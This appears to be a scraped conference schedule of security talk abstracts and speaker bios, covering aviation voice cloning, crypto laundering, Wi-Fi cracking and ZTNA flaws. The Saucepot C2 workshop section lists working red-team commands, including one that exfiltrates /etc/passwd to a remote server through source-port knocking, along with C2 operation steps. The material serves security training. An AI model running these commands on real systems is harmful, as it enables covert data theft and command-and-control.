Speakers:Ayaan Qayyum,Omar HamoudehAyaan is a Master of Science student in electrical engineering at Columbia University. His research interests include mobile computing, applied machine learning, edge AI, digital signal processing, mathematical modeling, and information systems. He completed his undergraduate studies at Rutgers University–New Brunswick, earning a Bachelor of Science in electrical and computer engineering with a minor in mathematics. His technical background spans embedded systems, wireless communication, and hardware security, with certifications in AWS AI and cloud technologies. He has published research across cybersecurity, FPGA systems, and machine learning, including a project on FPGA fast Fourier transform implementation and a machine learning-based stock forecasting model. His work has been recognized at academic conferences such as the IEEE Integrated STEM Education Conference and the Rutgers JJ Slade Research Symposium. He is currently a technical research intern at the Intelligent and Connected Systems Laboratory at Columbia University. He was a program mentor for the Governor's School of New Jersey designing search-and-rescue drone systems utilizing real-time edge inference. He is passionate about building scalable, open-source security tools and bridging the gap between theory and real-world deployment.
SpeakerBio: Omar HamoudehOmar is a wireless security enthusiast and builder who recently completed his B.S. in electrical and computer engineering at Rutgers University. His work focuses on embedded systems security, hardware hacking, and wireless exploitation. As part of a senior design project, he developed an unmanned wireless penetration testing rover using LoRa for remote Wi-Fi scanning and reconnaissance. The project earned second place at the 2025 Rutgers ECE Capstone Expo. He also worked extensively on secure architecture projects, including implementing TrustZone on an ARM-based microcontroller to separate secure and non-secure execution environments. In a separate project, he designed a lightweight firmware validation system to detect unauthorized modifications in IoT devices. His current research centers on building low-profile tools for wireless network exploitation and resilience testing.
- ics Calendar file
Neumann Lim has a strong background in cybersecurity and infrastructure management currently leading the Odlum Brown Team. He also has an extensive IR experience at previous companies such as Deloitte Canada, EY, CGI, and ISA. Currently, Neumann is serving in advisory board roles at SANS, EC-Council and other organizations. Neumann’s expertise includes digital forensics, incident response, modernizing infrastructure, infrastructure resilience, site reliability, malware research, pentesting and leadership in information security policies. Outside of corporate life, Neumann is the co-founder of Malware Village, judge and participant of various cyber CTFs. Neumann is often seen speaking or leading workshops at various conferences such as DEFCON, BlueTeamVillage, GrayhatCon, BSides, Toronto CISO Summit, CCTX, HTCIA, IACIS.
SpeakerBio: Jugal Patel
- ics Calendar file
DEF CON is renowned for bringing together some of the brightest minds in technology and security. By participating in VETCON, you have the chance to highlight the critical role veterans play in this landscape and explore how technology can support and enhance their lives.
- ics Calendar file
Voice cloning technology has advanced significantly, enabling the creation of convincing voice replicas using consumer-grade devices and publicly available tools. This poses critical challenges to aviation communication, where trust between pilots and air traffic controllers is paramount. The reliance on AM radio, with its low fidelity and lack of authentication, exacerbates the risk of fraudulent communications. This talk examines trust factors within aviation's air traffic control system, focusing on how air traffic controllers' voices can be cloned and where planes are most at risk. The talk explores FCC enforcement techniques for locating malicious actors, historical perspectives on alternative radio technologies, and the secondary systems pilots employ during communication failures. Simulated attacks will demonstrate how these vulnerabilities could disrupt operations, particularly at critical points such as runway crossings and in low-visibility conditions.
To mitigate these risks, this talk evaluates existing safeguards, including the Traffic Collision Avoidance System (TCAS), and discusses emerging technologies such as stop bars and guided runway lighting.
References:
Andrew Logan is an audio engineer, independent aviation journalist and developer @HelicoptersofDC who presented Tracking Military Ghost Helicopters over Washington DC at Def Con 30. Since then his advocacy urging lawmakers to review ADS-B exemptions for government aircraft has been cited by the Senate in the wake of the Flight 5342 crash.
- ics Calendar file
- ics Calendar file
Warhead is an offensive security tool that leverages Windows Atom Tables to store, retrieve, and execute payloads in a stealthy manner. This technique enables adversaries to place a payload in the Atom Table, use a legitimate process to extract it, and execute it in memory—bypassing traditional detection mechanisms. The first version of Warhead, to be released at Black Hat Arsenal 2025, provides security researchers and red teamers with a novel approach to payload delivery and execution that evades modern security defenses.
Speakers:Vishal "Vish" Thakur,David "Votd_ctf" WearingVishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.
He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.
SpeakerBio: David "Votd_ctf" Wearing
- ics Calendar file
Game cheats and malware share the same stealthy DNA - this talk breaks down how. We’ll explore cheat loaders and draw parallels between anti-cheat countermeasures and enterprise EDR techniques.
SpeakerBio: Joe "Juno" Aurelio, Security ResearcherJoe Aurelio is a distinguished security researcher with over a decade of hands-on experience in vulnerability research, reverse engineering, and mobile security. He currently leads teams of researchers in the private sector securing large-scale technology platforms. His expertise spans both the private and defense sectors, with a track record of uncovering critical security vulnerabilities in mobile applications and complex infrastructure affecting millions of users. In addition to his work in traditional security domains, he channels his passion for cybersecurity education with a unique interest in exploring game hacking techniques. He is a lead of the Game Hacking Village, where he teaches security by turning game hacks into ethical and engaging educational tools. Joe has a broad background in security, underscored by the highly respected OSCP certification and a Master’s degree in computer science.
- ics Calendar file
As software supply chains embrace transparency through SBOMs, hardware remains a black box. Yet the chips inside our IoT devices carry just as much — if not more — risk. From cloned components to opaque fabs, the semiconductor supply chain is fast becoming a national security flashpoint. Governments are scrambling to respond with blunt tools like bans and onshoring, but these approaches are slow, costly, and often impractical. Traditional BOMs focus on procurement and production — what gets bought and assembled — but they rarely capture origin, integrity, or risk context. They weren’t built to expose inter-organizational dependencies or detect supply chain manipulation. Enter the HBOM Initiative — a new effort to bring visibility, traceability, and accountability to the hardware supply chain. By developing tools and practices for a hardware bill of materials (HBOM), we aim to expose hidden risks, trace chip provenance, and empower sectors to make smarter, risk-informed decisions without sacrificing adaptability or innovation. This talk will explore why HBOMs are inevitable, what makes them hard, and how the hacker and security community can help shape the future of hardware trust.
SpeakerBio: Allan Friedman, Adjunct Professor of Informatics at the Luddy School of Informatics, Computing, and Engineering at Indiana University
- ics Calendar file
Cryptocurrency is everywhere now. Billion-dollar companies are built on it, entire economies run on Bitcoin, and cybercriminals love using it to finance their operations or hide stolen money. Cryptocurrencies promise anonymity, yet blockchain transactions are fully public, and make it tricky to hide funds.
In February 2025, the Bybit breach exposed two advanced attack vectors. First, a third-party wallet tool was compromised through malicious JavaScript injected into its logic, allowing attackers to manipulate smart contract behavior. Second, a SAFE Wallet developer was tricked through social engineering into running a fake Docker container, giving attackers persistent access to his machine.
With control established, they hijacked proxy contracts and executed stealth withdrawals of ETH and ERC-20 tokens. The stolen assets were laundered through decentralized exchanges, split across multiple wallets, bridged to Bitcoin, and passed through mixers like Wasabi Wallet.
So how do attackers manage to launder crypto, and how can we stop them? Using the 1.46 billion dollar Bybit hack by North Korea’s Lazarus Group as a case study, this talk breaks down each laundering step and explains how to automate tracking and accelerate investigations using AI.
References:
SpeakerBio: Thomas "fr0gger_" RocciaThomas Roccia is a Senior Security Researcher at Microsoft with over 15 years of experience in the cybersecurity industry. His work focuses on threat intelligence and malware analysis.
Throughout his career, he has investigated major cyberattacks, managed critical outbreaks, and collaborated with law enforcement while tracking cybercrime and nation-state campaigns. He has traveled globally to respond to threats and share his expertise.
Thomas is a regular speaker at leading security conferences and an active contributor to the open-source community. Since 2015, he has maintained the Unprotect Project, an open database of malware evasion techniques. In 2023, he published Visual Threat Intelligence: An Illustrated Guide for Threat Researchers, which became a bestseller and won the Bronze Foreword INDIES Award in the Science & Technology category.
- ics Calendar file
Port knocking is a stealthy network authentication technique (T1205.001) in which a client sends a specific sequence of connection attempts (or "knocks") to closed ports on a server. When the correct sequence is received, the server dynamically opens a port or triggers an action, enabling concealed access or communication. Saucepot C2 elevates the port knocking technique to a new level. Instead of using destination ports (DstPorts) in TCP sessions as knock sequences, it leverages source ports (SrcPorts), also known as ephemeral ports. This approach allows data exfiltration even in highly restrictive firewall environments where only a single outbound port, such as port 443, is allowed.
In this workshop, attendees will use Saucepot C2 in conjunction with the following MITRE ATT&CK techniques to conduct specific Red Team activities:
| Technique ID | Technique Name | Tactic |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Exfiltration |
| T1071.001 | Application Layer Protocol: Web | Command and Control |
| T1205.001 | Traffic Signaling: Port Knocking | Command and Control / Defense Evasion |
Saucepot C2 has been open-sourced at https://github.com/netskopeoss/saucepot. Supported commands or features in Sacuepot C2 include: - Check-in / heartbeat - Directory listing - Process listing - File upload
Server:
sudo apt install net-tools knockd nginx python3-pip python3-scapy
git clone https://github.com/netskopeoss/saucepot
echo "v2025.8" | sudo tee /var/www/html/chk-version
Client:
sudo apt install net-tools python3-tqdm python3-psutil python3-pycurl
git clone https://github.com/netskopeoss/saucepot
Server: Hide the web server until the correct knock sequences (4100, 4200, 4500) have been provided.
sudo iptables -I INPUT -p tcp --dport 80 -j REJECT
sudo systemctl start nginx
Add the following section to /etc/knockd.conf
[OpenCloseSecretWeb]
sequence = 4100,4200,4500
seq_timeout = 30
tcpflags = syn
start_command = /usr/sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
cmd_timeout = 7200
stop_command = /usr/sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
If the default interface is not eth0, add Interface = InterfaceName to the [options] section.
Restart the knockd:
sudo systemctl restart knockd
Client:
The protected web service should be unreachable by default.
curl http://server_public_ip
Provide the correct knock sequences; the protected web service should now be reachable.
for f in 4100 4200 4500; do nc -w2 server_public_ip $f; done
curl http://server_public_ip
Exercise 2: Ephemeral port checker Check whether you're in a friendly environment where the client's source port is preserved after NAT, a crucial requirement for ephemeral port abuse to work. If the laptop's network environment fails the test, an additional VPC instance will be needed to act as the client.
Server:
sudo systemctl stop nginx
sudo python3 saucepot-server.py -c -p 80
Client: ``` python3 saucepot-client.py -c -d server_public_ip -p 80
Test 1 with ephemeral port 63034: PASS Test 2 with ephemeral port 51151: PASS Test 3 with ephemeral port 54321: PASS
Ephemeral port test succeeded. Enjoy Port Knocking 2.0 technique! ```
Exercise 3: Data exfiltration Exfiltrate a specified file to the server without establishing persistent TCP connections. The connection state is managed through different port-knocking sequences, such as session-start and session-end. The data to be exfiltrated is transmitted via the source port (SrcPort) field of TCP packets within a designated port range.
Server:
sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
Client:
Exfiltrate /etc/passwd to the server
python3 saucepot-client.py -d server_public_ip -p 80 --upload /etc/passwd
Exercise 4: Command-and-control operations To achieve bidirectional communication, the Last-Modified header in HTTP responses is used to deliver C2 commands to the client. Saucepot C2 currently supports a few simple commands, such as ls, ps, and others.
Server:
sudo systemctl start nginx
sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
Client:
python3 saucepot-client.py -d server_public_ip -p 80
Exercise 5: Observation of anomalies at L4 and L7 Observe the anomalies at L4 and L7
On the server, in two separate windows:
web access log:
tail -F /var/log/nginx/access.log
SYN packets:
sudo tcpdump -i enX0 -n 'tcp[tcpflags] & tcp-syn != 0'
This workshop has been verified on Ubuntu 24.04 LTS
-d ip arg on ServerHubert Lin is an offensive security expert specializing in remote vulnerability exploitation, honeypots, and penetration testing. He previously led a signature team for network threat defense and served as a senior staff engineer on a Red Team, where he evaluated network intrusion prevention systems and conducted sanctioned red team exercises to strengthen corporate security. Hubert holds certifications as a Red Hat Certified Engineer (RHCE) and an Offensive Security Certified Professional (OSCP). Currently, he works at Netskope as a Principal Researcher and has talked at DEFCON Cloud Village, RSAC, BSidesLV, BSidesSG, Australian CyberCon, GovWare, and CYBERSEC in the past few years.
- ics Calendar file
In Wi-Fi-So-Serious, we will explore setting up and troubleshooting a 802.11(Wi-Fi) assessment rig. Then, we will look at passive reconnaissance and cracking different Wi-Fi security protocols. Using the Kali Linux VM, we will set up our 802.11 cards in monitor mode and configure them to collect PCAPs. Participants will be taught the methodology and commands needed to troubleshoot wireless cards in Linux. We will work with command line tools like iw, iwconfig, hostapd, wpa_cli, and wpa_supplican along with others. Next, the course challenges participants to perform passive collections and work with Wireshark display filters. The course then covers cracking common 802.11 security protocols with Aircrack-ng, Wifite, Airgeddon, Reaver, and Wacker.The Wi-Fi-So-Serious workshops concludes with a Capture The Flag (CTF) so that participants can apply the course content with hands on keyboard. Participants will also learn how to set up a lab they can take home with them
Speakers:James Hawk,Brian BurnettJames Hawk (He/Him) is a Principal Consultant with Google Public Sector within Proactive Services. He is the wireless subject matter expert for his team. James has led and contributed to numerous assessments (Red Teams and Pen Tests). He has developed internal training and tool updates for 802.11 for his company. James is a 20-year veteran of the U.S. Army and has over 10 years of hands-on experience in wireless technologies. James is constantly researching/testing 802.11 attacks against his home lab. He is a fan of hockey, LetterKenny, and almost anything sci-fi.
SpeakerBio: Brian Burnett, Founder of Offensive Technical SolutionsBrian Burnett is the founder of Offensive Technical Solutions (OTS) where he conducts web-application, internal network, and cloud penetration tests. Prior to founding OTS, he served five years in the United States Army, followed by seven years supporting internal teams at Fortune 500 companies. Brian holds degrees in computer science, pentesting, theology, and Russian. He enjoys tinkering with his homelab, collecting certifications, and committing poorly written code. His hobbies include Brazilian Jiu-Jitsu, purchasing unnecessary power tools, and CrossFit.
- ics Calendar file
While passkeys are being touted as the end of phishing, they might be putting your organization at even more risk. In this talk I will demonstrate a relatively straightforward phishing attack against “phishing-resistant” synced passkeys and provide guidance and advice for responsible passkey usage.
SpeakerBio: Chad Spensky, AllthenticatePh.D.Chad is a teenage hacker turned cybersecurity expert who studied under the best in his field at UNC-CH, UCSB’s SecLab, IBM Research, and was a lead researcher at MIT LL where he played a pivotal role in various high-impact projects for the US DoD. He has broken every authentication system under the sun and has committed his career to doing better for our society.
- ics Calendar file
- ics Calendar file
Many organisations are moving to Zero Trust Network Access (ZTNA) and Secure Access Service Edge (SASE) solutions in response to the real and well-documented risks associated with traditional VPNs. These cloud-era alternatives promise improved security through finer-grained access controls and better posture enforcement. But are these 'next-gen' cloud VPNs truly secure? In this 45-minute session, we present new research revealing that many leading ZTNA platforms - including offerings from ZScaler, Netskope and Check Point - inherit legacy VPN weaknesses while introducing fresh cloud-based attack surfaces.
We demonstrate the process of external recon, bypassing authentication and device posture checks (including hardware ID spoofing) and abuse insecure inter-process communication (IPC) between ZTNA client components to achieve local privilege escalation. We show it is possible to circumvent traffic steering to reach blocked content, exploit flaws in authentication flows to undermine device trust, and even run malicious ZTNA servers that execute code on connecting clients. Throughout the presentation, we highlight previously undisclosed vulnerabilities identified during our research. Zero trust does not mean zero risk.
References:
Red Team Operator at AmberWolf (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells' at SANS HackFest Hollywood 2024. David has led red team operations uncovering critical flaws in enterprise remote access tools and has a passion for reverse engineering security products.
SpeakerBio: Rich "Buffaloverflow" Warren, Red Team Operator at AmberWolfRed Team Operator at AmberWolf and Microsoft Top 100 Security Researcher (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients…' at HackFest Hollywood 2024. Richard has a track record of discovering novel vulnerabilities in VPN and zero-trust clients and has contributed to multiple high-profile vulnerability disclosures and tools in the offensive security community.
- ics Calendar file